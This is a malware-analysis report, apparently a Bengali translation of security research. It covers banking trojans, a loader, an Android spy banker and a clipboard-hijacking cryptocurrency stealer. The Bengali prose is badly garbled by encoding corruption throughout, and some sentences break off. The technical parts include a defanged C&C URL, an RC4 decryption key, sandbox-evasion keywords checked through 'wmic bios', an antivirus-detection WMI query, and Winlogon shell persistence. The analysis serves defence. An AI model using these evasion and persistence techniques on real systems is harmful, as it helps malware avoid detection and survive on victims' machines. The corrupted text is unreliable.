āĻŦāĻžāĻā§āĻ¸āĻ¯ā§āĻā§āĻ¤ āĻŦāĻž āĻ āĻ¸ā§āĻĒāĻˇā§āĻ āĻāĻŋāĻ˛ āĻ¨āĻžāĨ¤ āĻāĻāĻ°āĻŖāĻā§ āĻŽā§āĻā§āĻļ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻāĻāĻŽāĻžāĻ¤ā§āĻ° āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻšāĻ˛ āĻ¸ā§āĻā§āĻ°āĻŋāĻ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒāĻļāĻ¨āĨ¤ āĻ āĻĒāĻžāĻ°ā§āĻāĻ° āĻāĻ¯āĻŧāĻžāĻ˛ā§āĻ āĻ āĻŋāĻāĻžāĻ¨āĻž RC4 āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ āĻāĻžāĻ°ā§āĻā§āĻ āĻā§āĻ°āĻŋāĻĒā§āĻā§āĻāĻžāĻ°ā§āĻ¨ā§āĻ¸āĻŋ āĻšāĻ˛ āĻŦāĻŋāĻāĻāĻ¯āĻŧā§āĻ¨, āĻŦāĻŋāĻāĻāĻ¯āĻŧā§āĻ¨ āĻā§āĻ¯āĻžāĻļ, āĻĄā§āĻāĻāĻ¯āĻŧā§āĻ¨, āĻāĻĨā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻŽ āĻāĻŦāĻ āĻ°āĻŋāĻĒāĻ˛āĨ¤
āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻŦāĻŋāĻāĻāĻ¯āĻŧā§āĻ¨ āĻāĻ¯āĻŧāĻžāĻ˛ā§āĻā§ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻāĻĄāĻŧāĻŋāĻ¯āĻŧā§ āĻĒāĻĄāĻŧāĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ, āĻāĻŋāĻāĻŋāĻāĻ¸-āĻ āĻāĻāĻāĻŋ āĻā§āĻ āĻĒāĻ°āĻŋāĻŽāĻžāĻŖ āĻĒāĻžāĻ āĻžāĻ¨ā§ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛, āĻ¯āĻž āĻĒā§āĻ°āĻāĻžāĻ°āĻŖāĻžāĻ° āĻ¸āĻžāĻĢāĻ˛ā§āĻ¯ā§āĻ° āĻāĻĒāĻ° āĻ¸āĻ¨ā§āĻĻā§āĻš āĻĒā§āĻ°āĻāĻžāĻļ āĻāĻ°ā§āĨ¤ āĻāĻĒāĻ°āĻ¨ā§āĻ¤ā§, āĻāĻ āĻ˛ā§āĻ¨āĻĻā§āĻ¨āĻā§āĻ˛āĻŋ āĻā§āĻ˛āĻŋāĻĒāĻŦā§āĻ¯āĻžāĻā§āĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻŋāĻ¤ āĻāĻŋāĻ˛ āĻāĻŽāĻ¨ āĻā§āĻ¨āĻ āĻĒā§āĻ°āĻŽāĻžāĻŖ āĻ¨ā§āĻā§ˇ
Win32/RTM
Win32/RTM āĻāĻĒāĻžāĻĻāĻžāĻ¨āĻāĻŋ āĻŽāĻžāĻ°ā§āĻ 2019 āĻāĻ° āĻļā§āĻ°ā§āĻ¤ā§ āĻŦā§āĻļ āĻāĻŋāĻā§ āĻĻāĻŋāĻ¨ āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻāĻ°āĻāĻŋāĻāĻŽ āĻšāĻ˛ āĻĄā§āĻ˛āĻĢāĻŋāĻ¤ā§ āĻ˛ā§āĻāĻž āĻāĻāĻāĻŋ āĻā§āĻ°ā§āĻāĻžāĻ¨ āĻŦā§āĻ¯āĻžāĻā§āĻāĻžāĻ°, āĻ¯āĻžāĻ° āĻ˛āĻā§āĻˇā§āĻ¯ āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻŦā§āĻ¯āĻžāĻā§āĻāĻŋāĻ āĻŦā§āĻ¯āĻŦāĻ¸ā§āĻĨāĻžāĨ¤ 2017 āĻ¸āĻžāĻ˛ā§, ESET āĻāĻŦā§āĻˇāĻāĻ°āĻž āĻĒā§āĻ°āĻāĻžāĻļ āĻāĻ°ā§āĻā§āĻ¨
āĻŦā§āĻšāĻā§āĻ°ā§āĻ¯āĻžāĻĒ āĻ˛ā§āĻĄāĻžāĻ°
āĻāĻŋāĻā§ āĻ¸āĻŽāĻ¯āĻŧā§āĻ° āĻāĻ¨ā§āĻ¯, āĻāĻāĻāĻŋ āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄāĻžāĻ° āĻāĻŋāĻāĻšāĻžāĻŦā§ āĻāĻĒāĻ˛āĻŦā§āĻ§ āĻāĻŋāĻ˛ āĻ¯āĻž āĻĒā§āĻ°ā§āĻŦāĻŦāĻ°ā§āĻ¤ā§ āĻŦā§āĻšāĻā§āĻ°ā§āĻ¯āĻžāĻĒ āĻ¸āĻ°āĻā§āĻāĻžāĻŽāĻā§āĻ˛āĻŋāĻ° āĻŽāĻ¤ā§ āĻāĻŋāĻ˛ āĻ¨āĻžāĨ¤ āĻ¸ā§ āĻā§āĻ°ā§ āĻĻāĻžāĻāĻĄāĻŧāĻžāĻ¯āĻŧ https://94.100.18[.]67/RSS.php?<some_id>
āĻĒāĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§ āĻĒā§āĻ¤ā§ āĻāĻŦāĻ āĻāĻāĻŋ āĻŽā§āĻŽāĻ°āĻŋāĻ¤ā§ āĻ¸āĻ°āĻžāĻ¸āĻ°āĻŋ āĻ˛ā§āĻĄ āĻāĻ°āĻ¤ā§āĨ¤ āĻāĻŽāĻ°āĻž āĻĻā§āĻŦāĻŋāĻ¤ā§āĻ¯āĻŧ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§āĻ° āĻā§āĻĄā§āĻ° āĻĻā§āĻāĻŋ āĻāĻāĻ°āĻŖāĻā§ āĻāĻ˛āĻžāĻĻāĻž āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŋāĨ¤ āĻĒā§āĻ°āĻĨāĻŽ URL-āĻ, RSS.php āĻ¸āĻ°āĻžāĻ¸āĻ°āĻŋ āĻŦā§āĻšāĻā§āĻ°ā§āĻ¯āĻžāĻĒ āĻŦā§āĻ¯āĻžāĻāĻĄā§āĻ° āĻĒāĻžāĻ¸ āĻāĻ°ā§āĻā§ - āĻāĻ āĻŦā§āĻ¯āĻžāĻāĻĄā§āĻ°āĻāĻŋ āĻ¸ā§āĻ°ā§āĻ¸ āĻā§āĻĄ āĻĢāĻžāĻāĻ¸ āĻšāĻāĻ¯āĻŧāĻžāĻ° āĻĒāĻ°ā§ āĻāĻĒāĻ˛āĻŦā§āĻ§ āĻāĻāĻāĻŋāĻ° āĻŽāĻ¤ā§āĨ¤
āĻŽāĻāĻžāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧ āĻšāĻ˛, āĻāĻŽāĻ°āĻž āĻŦā§āĻšāĻā§āĻ°ā§āĻ¯āĻžāĻĒ āĻŦā§āĻ¯āĻžāĻāĻĄā§āĻ° āĻ¸āĻš āĻŦā§āĻļ āĻāĻ¯āĻŧā§āĻāĻāĻŋ āĻĒā§āĻ°āĻāĻžāĻ°āĻŖāĻž āĻĻā§āĻāĻŋ āĻāĻŦāĻ āĻ¸ā§āĻā§āĻ˛āĻŋ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻ
āĻĒāĻžāĻ°ā§āĻāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻŋāĻ¤ āĻšāĻ¯āĻŧ āĻŦāĻ˛ā§ āĻ
āĻāĻŋāĻ¯ā§āĻā§ˇ āĻāĻ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§, āĻĒā§āĻ°āĻ§āĻžāĻ¨ āĻĒāĻžāĻ°ā§āĻĨāĻā§āĻ¯ āĻšāĻ˛ āĻ¯ā§ āĻŦā§āĻ¯āĻžāĻāĻĄā§āĻ°āĻāĻŋ āĻ¸āĻ°āĻžāĻ¸āĻ°āĻŋ āĻŽā§āĻŽāĻ°āĻŋāĻ¤ā§ āĻ˛ā§āĻĄ āĻāĻ°āĻž āĻšāĻ¯āĻŧ āĻāĻŦāĻ āĻāĻŽāĻ°āĻž āĻ¯ā§ DLL āĻ¸ā§āĻĨāĻžāĻĒāĻ¨āĻž āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ° āĻ¸āĻžāĻĨā§ āĻāĻĨāĻž āĻŦāĻ˛ā§āĻāĻŋ āĻ¤āĻžāĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻ¸ā§āĻāĻŋāĻŽ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻ¨āĻžāĨ¤
āĻĻā§āĻŦāĻŋāĻ¤ā§āĻ¯āĻŧ, āĻāĻ°āĻ āĻāĻāĻŋāĻ˛ āĻāĻāĻ°āĻŖ āĻāĻŋāĻ˛ āĻ¯ā§ RSS.php URL āĻ
āĻ¨ā§āĻ¯ āĻ˛ā§āĻĄāĻžāĻ°ā§ āĻĒāĻžāĻ āĻžāĻ¨ā§ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻāĻāĻŋ āĻāĻŋāĻā§ āĻ
āĻ¸ā§āĻĒāĻˇā§āĻāĻ¤āĻž āĻĒā§āĻ°āĻ¯āĻŧā§āĻ āĻāĻ°ā§āĻā§, āĻ¯ā§āĻŽāĻ¨ āĻāĻ¤āĻŋāĻļā§āĻ˛ āĻāĻŽāĻĻāĻžāĻ¨āĻŋ āĻā§āĻŦāĻŋāĻ˛ āĻĒā§āĻ¨āĻ°ā§āĻ¨āĻŋāĻ°ā§āĻŽāĻžāĻŖāĨ¤ āĻŦā§āĻāĻ˛ā§āĻĄāĻžāĻ°ā§āĻ° āĻāĻĻā§āĻĻā§āĻļā§āĻ¯ āĻšāĻ˛ C&C āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¯ā§āĻāĻžāĻ¯ā§āĻ āĻāĻ°āĻž
Android/Spy.Banker
āĻŽāĻāĻžāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧ āĻšāĻ˛, āĻ ā§āĻ¯āĻžāĻ¨ā§āĻĄā§āĻ°āĻ¯āĻŧā§āĻĄā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ āĻāĻĒāĻžāĻĻāĻžāĻ¨āĻ āĻāĻŋāĻāĻšāĻžāĻŦ āĻ¸āĻāĻā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛ā§ āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻā§āĻā§āĨ¤ āĻ¤āĻŋāĻ¨āĻŋ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻāĻāĻāĻŋ āĻĻāĻŋāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻĒā§āĻ°āĻ§āĻžāĻ¨ āĻļāĻžāĻāĻžāĻ¯āĻŧ āĻāĻŋāĻ˛ā§āĻ¨ - āĻ¨āĻā§āĻŽā§āĻŦāĻ° 1, 2018āĨ¤ GitHub āĻ āĻĒā§āĻ¸ā§āĻ āĻāĻ°āĻž āĻāĻžāĻĄāĻŧāĻžāĻ, ESET āĻā§āĻ˛āĻŋāĻŽā§āĻā§āĻ°āĻŋ āĻāĻ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻŦāĻŋāĻ¤āĻ°āĻŖā§āĻ° āĻā§āĻ¨ā§ āĻĒā§āĻ°āĻŽāĻžāĻŖ āĻā§āĻāĻā§ āĻĒāĻžāĻ¯āĻŧāĻ¨āĻŋāĨ¤
āĻāĻĒāĻžāĻĻāĻžāĻ¨āĻāĻŋ āĻāĻāĻāĻŋ āĻ ā§āĻ¯āĻžāĻ¨ā§āĻĄā§āĻ°āĻ¯āĻŧā§āĻĄ āĻ ā§āĻ¯āĻžāĻĒā§āĻ˛āĻŋāĻā§āĻļāĻ¨ āĻĒā§āĻ¯āĻžāĻā§āĻ (āĻāĻĒāĻŋāĻā§) āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻšā§āĻ¸ā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻāĻāĻž āĻĒā§āĻ°āĻāĻ¨ā§āĻĄāĻāĻžāĻŦā§ āĻ āĻ¸ā§āĻĒāĻˇā§āĻ. APK-āĻ āĻ āĻŦāĻ¸ā§āĻĨāĻŋāĻ¤ āĻāĻāĻāĻŋ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž JAR-āĻ āĻĻā§āĻˇāĻŋāĻ¤ āĻāĻāĻ°āĻŖ āĻ˛ā§āĻāĻŋāĻ¯āĻŧā§ āĻāĻā§āĨ¤ āĻāĻāĻŋ āĻāĻ āĻā§ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ RC4 āĻĻāĻŋāĻ¯āĻŧā§ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
āĻ¸ā§āĻā§āĻ°āĻŋāĻ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻ¤ā§ āĻāĻāĻ āĻā§ āĻāĻŦāĻ āĻ
ā§āĻ¯āĻžāĻ˛āĻāĻ°āĻŋāĻĻāĻŽ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ JAR āĻ
āĻŦāĻ¸ā§āĻĨāĻŋāĻ¤ APK_ROOT + image/files
. āĻĢāĻžāĻāĻ˛ā§āĻ° āĻĒā§āĻ°āĻĨāĻŽ 4 āĻŦāĻžāĻāĻā§ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž JAR āĻāĻ° āĻĻā§āĻ°ā§āĻā§āĻ¯ āĻĨāĻžāĻā§, āĻ¯āĻž āĻĻā§āĻ°ā§āĻā§āĻ¯ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§āĻ° āĻĒāĻ°āĻĒāĻ°āĻ āĻļā§āĻ°ā§ āĻšāĻ¯āĻŧāĨ¤
āĻĢāĻžāĻāĻ˛āĻāĻŋ āĻĄāĻŋāĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻžāĻ° āĻĒāĻ°ā§, āĻāĻŽāĻ°āĻž āĻāĻŦāĻŋāĻˇā§āĻāĻžāĻ° āĻāĻ°ā§āĻāĻŋ āĻ¯ā§ āĻāĻāĻŋ āĻāĻ¨ā§āĻŦāĻŋāĻ¸ āĻāĻŋāĻ˛ - āĻāĻā§
- āĻŽāĻžāĻāĻā§āĻ°ā§āĻĢā§āĻ¨ āĻ°ā§āĻāĻ°ā§āĻĄāĻŋāĻ
- āĻ¸ā§āĻā§āĻ°āĻŋāĻ¨āĻļāĻ āĻ¨ā§āĻāĻ¯āĻŧāĻž
- āĻāĻŋāĻĒāĻŋāĻāĻ¸ āĻ¸ā§āĻĨāĻžāĻ¨āĻžāĻā§āĻ āĻĒāĻžāĻāĻ¯āĻŧāĻž
- keylogger
- āĻĄāĻŋāĻāĻžāĻāĻ¸ āĻĄā§āĻāĻž āĻāĻ¨āĻā§āĻ°āĻŋāĻĒāĻļāĻ¨ āĻāĻŦāĻ āĻŽā§āĻā§āĻ¤āĻŋāĻĒāĻŖ āĻĻāĻžāĻŦāĻŋ
- āĻ¸ā§āĻĒā§āĻ¯āĻžāĻŽ āĻĒāĻžāĻ āĻžāĻ¨ā§
āĻŽāĻāĻžāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧ āĻšāĻ˛, āĻŦā§āĻ¯āĻžāĻā§āĻāĻžāĻ° āĻ āĻ¨ā§āĻ¯ C&C āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ āĻŦā§āĻ¯āĻžāĻāĻāĻĒ āĻ¯ā§āĻāĻžāĻ¯ā§āĻ āĻā§āĻ¯āĻžāĻ¨ā§āĻ˛ āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻā§āĻāĻāĻžāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻāĻŋāĻ˛ā§āĻ¨āĨ¤ āĻāĻŽāĻ°āĻž āĻ¯ā§ āĻ¨āĻŽā§āĻ¨āĻž āĻŦāĻŋāĻļā§āĻ˛ā§āĻˇāĻŖ āĻāĻ°ā§āĻāĻŋ āĻ¸ā§āĻāĻŋ @JonesTrader āĻ ā§āĻ¯āĻžāĻāĻžāĻāĻ¨ā§āĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻā§, āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻŦāĻŋāĻļā§āĻ˛ā§āĻˇāĻŖā§āĻ° āĻ¸āĻŽāĻ¯āĻŧ āĻāĻāĻŋ āĻāĻ¤āĻŋāĻŽāĻ§ā§āĻ¯ā§āĻ āĻŦā§āĻ˛āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§āĨ¤
āĻŦā§āĻ¯āĻžāĻāĻāĻžāĻ° āĻ ā§āĻ¯āĻžāĻ¨ā§āĻĄā§āĻ°āĻ¯āĻŧā§āĻĄ āĻĄāĻŋāĻāĻžāĻāĻ¸ā§ āĻ˛āĻā§āĻˇā§āĻ¯ āĻ ā§āĻ¯āĻžāĻĒā§āĻ˛āĻŋāĻā§āĻļāĻ¨ā§āĻ° āĻāĻāĻāĻŋ āĻ¤āĻžāĻ˛āĻŋāĻāĻž āĻ°āĻ¯āĻŧā§āĻā§. āĻāĻāĻŋ āĻ¸ā§āĻĢā§āĻ¸ āĻāĻŦā§āĻˇāĻŖāĻžāĻ¯āĻŧ āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ āĻ¤āĻžāĻ˛āĻŋāĻāĻžāĻ° āĻā§āĻ¯āĻŧā§ āĻĻā§āĻ°ā§āĻāĨ¤ āĻ¤āĻžāĻ˛āĻŋāĻāĻžāĻ¯āĻŧ āĻ āĻ¨ā§āĻ āĻŦā§āĻ¯āĻžāĻā§āĻāĻŋāĻ āĻ ā§āĻ¯āĻžāĻĒā§āĻ˛āĻŋāĻā§āĻļāĻ¨, āĻ ā§āĻ¯āĻžāĻŽāĻžāĻāĻ¨ āĻāĻŦāĻ āĻāĻŦā§-āĻāĻ° āĻŽāĻ¤ā§ āĻ āĻ¨āĻ˛āĻžāĻāĻ¨ āĻļāĻĒāĻŋāĻ āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽ āĻāĻŦāĻ āĻā§āĻ°āĻŋāĻĒā§āĻā§āĻāĻžāĻ°ā§āĻ¨ā§āĻ¸āĻŋ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻ āĻ¨ā§āĻ¤āĻ°ā§āĻā§āĻā§āĻ¤ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤
MSIL/ClipBanker.IH
āĻāĻ āĻĒā§āĻ°āĻāĻžāĻ°āĻŖāĻžāĻ° āĻ āĻāĻļ āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻž āĻļā§āĻˇ āĻāĻĒāĻžāĻĻāĻžāĻ¨āĻāĻŋ āĻāĻŋāĻ˛ .NET āĻāĻāĻ¨ā§āĻĄā§āĻ āĻāĻā§āĻ¸āĻŋāĻāĻŋāĻāĻā§āĻŦāĻ˛, āĻ¯āĻž āĻŽāĻžāĻ°ā§āĻ 2019 āĻ āĻāĻĒāĻ¸ā§āĻĨāĻŋāĻ¤ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻ āĻ§ā§āĻ¯āĻ¯āĻŧāĻ¨ āĻāĻ°āĻž āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖāĻā§āĻ˛āĻŋāĻ° āĻŦā§āĻļāĻŋāĻ°āĻāĻžāĻāĻ ConfuserEx v1.0.0 āĻĻāĻŋāĻ¯āĻŧā§ āĻĒā§āĻ¯āĻžāĻā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛ā§ˇ āĻā§āĻ˛āĻŋāĻĒāĻŦā§āĻ¯āĻžāĻā§āĻāĻžāĻ°ā§āĻ° āĻŽāĻ¤ā§, āĻāĻ āĻāĻĒāĻžāĻĻāĻžāĻ¨āĻāĻŋ āĻā§āĻ˛āĻŋāĻĒāĻŦā§āĻ°ā§āĻĄ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ āĻ¤āĻžāĻ° āĻ˛āĻā§āĻˇā§āĻ¯ āĻšāĻ˛ āĻŦāĻŋāĻ¸ā§āĻ¤ā§āĻ¤ āĻā§āĻ°āĻŋāĻĒā§āĻā§āĻāĻžāĻ°ā§āĻ¨ā§āĻ¸āĻŋ, āĻ¸ā§āĻāĻ¸āĻžāĻĨā§ āĻ¸ā§āĻāĻŋāĻŽā§ āĻ āĻĢāĻžāĻ°āĨ¤ āĻāĻĒāĻ°āĻ¨ā§āĻ¤ā§, āĻ¤āĻŋāĻ¨āĻŋ āĻŦāĻŋāĻāĻāĻ¯āĻŧā§āĻ¨ āĻŦā§āĻ¯āĻā§āĻ¤āĻŋāĻāĻ¤ WIF āĻā§ āĻā§āĻ°āĻŋ āĻāĻ°āĻ¤ā§ āĻāĻāĻĒāĻŋ āĻ˛āĻāĻžāĻ° āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻ¨āĨ¤
āĻ¸ā§āĻ°āĻā§āĻˇāĻž āĻŦā§āĻ¯āĻŦāĻ¸ā§āĻĨāĻž
ConfuserEx āĻĄāĻŋāĻŦāĻžāĻāĻŋāĻ, āĻĄāĻžāĻŽā§āĻĒāĻŋāĻ āĻāĻŦāĻ āĻā§āĻŽā§āĻĒāĻžāĻ°āĻŋāĻ āĻĒā§āĻ°āĻ¤āĻŋāĻ°ā§āĻ§ā§ āĻ¯ā§ āĻ¸ā§āĻŦāĻŋāĻ§āĻžāĻā§āĻ˛āĻŋ āĻĒā§āĻ°āĻĻāĻžāĻ¨ āĻāĻ°ā§ āĻ¤āĻžāĻ° āĻĒāĻžāĻļāĻžāĻĒāĻžāĻļāĻŋ, āĻāĻĒāĻžāĻĻāĻžāĻ¨āĻāĻŋāĻ¤ā§ āĻ
ā§āĻ¯āĻžāĻ¨ā§āĻāĻŋāĻāĻžāĻāĻ°āĻžāĻ¸ āĻĒāĻŖā§āĻ¯ āĻāĻŦāĻ āĻāĻžāĻ°ā§āĻā§āĻ¯āĻŧāĻžāĻ˛ āĻŽā§āĻļāĻŋāĻ¨ āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻžāĻ° āĻā§āĻˇāĻŽāĻ¤āĻž āĻ
āĻ¨ā§āĻ¤āĻ°ā§āĻā§āĻā§āĻ¤ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤
āĻāĻāĻŋ āĻāĻāĻāĻŋ āĻāĻžāĻ°ā§āĻā§āĻ¯āĻŧāĻžāĻ˛ āĻŽā§āĻļāĻŋāĻ¨ā§ āĻāĻ˛ā§ āĻ¤āĻž āĻ¯āĻžāĻāĻžāĻ āĻāĻ°āĻ¤ā§, āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°āĻāĻŋ āĻŦāĻŋāĻ˛ā§āĻ-āĻāĻ¨ āĻāĻāĻ¨ā§āĻĄā§āĻ WMI āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ˛āĻžāĻāĻ¨ (WMIC) āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ BIOS āĻ¤āĻĨā§āĻ¯ā§āĻ° āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻāĻ°ā§, āĻ¯āĻĨāĻž:
wmic bios
āĻ¤āĻžāĻ°āĻĒāĻ° āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽāĻāĻŋ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻāĻāĻĒā§āĻ āĻĒāĻžāĻ°ā§āĻ¸ āĻāĻ°ā§ āĻāĻŦāĻ āĻā§āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄāĻā§āĻ˛āĻŋ āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻāĻ°ā§: VBOX, VirtualBox, XEN, qemu, bochs, VMāĨ¤
āĻ
ā§āĻ¯āĻžāĻ¨ā§āĻāĻŋāĻāĻžāĻāĻ°āĻžāĻ¸ āĻĒāĻŖā§āĻ¯ āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻ¤ā§, āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻ¸āĻŋāĻāĻŋāĻāĻ°āĻŋāĻāĻŋ āĻ¸ā§āĻ¨ā§āĻāĻžāĻ°ā§ āĻāĻāĻāĻŋ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻŽā§āĻ¨ā§āĻ āĻāĻ¨āĻ¸ā§āĻā§āĻ°ā§āĻŽā§āĻ¨ā§āĻā§āĻļāĻ¨ (WMI) āĻ
āĻ¨ā§āĻ°ā§āĻ§ āĻĒāĻžāĻ āĻžāĻ¯āĻŧ ManagementObjectSearcher
API āĻ¨ā§āĻā§ āĻĻā§āĻāĻžāĻ¨ā§ āĻšāĻŋāĻ¸āĻžāĻŦā§. āĻŦā§āĻ¸ 64 āĻĨā§āĻā§ āĻĄāĻŋāĻā§āĻĄ āĻāĻ°āĻžāĻ° āĻĒāĻ°ā§ āĻāĻ˛āĻāĻŋ āĻāĻāĻ°āĻāĻŽ āĻĻā§āĻāĻžāĻ¯āĻŧ:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
āĻāĻŋāĻ¤ā§āĻ° 3. āĻ
ā§āĻ¯āĻžāĻ¨ā§āĻāĻŋāĻāĻžāĻāĻ°āĻžāĻ¸ āĻĒāĻŖā§āĻ¯ āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻžāĻ° āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĨ¤
āĻāĻĒāĻ°āĻ¨ā§āĻ¤ā§, āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻāĻŋāĻ¨āĻž āĻ¤āĻž āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°ā§
āĻā§āĻĻ
āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧāĻžāĻ°ā§āĻ° āĻ¯ā§ āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖāĻāĻŋ āĻāĻŽāĻ°āĻž āĻ
āĻ§ā§āĻ¯āĻ¯āĻŧāĻ¨ āĻāĻ°ā§āĻāĻŋ āĻ¤āĻž āĻ¨āĻŋāĻā§āĻ āĻ
āĻ¨ā§āĻ˛āĻŋāĻĒāĻŋ āĻāĻ°ā§ā§ˇ %APPDATA%googleupdater.exe
āĻāĻŦāĻ āĻā§āĻāĻ˛ āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ° āĻāĻ¨ā§āĻ¯ "āĻ˛ā§āĻāĻžāĻ¨ā§" āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯ āĻ¸ā§āĻ āĻāĻ°ā§āĨ¤ āĻ¤āĻžāĻ°āĻĒāĻ° āĻ¸ā§ āĻŽāĻžāĻ¨ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻ°ā§ SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
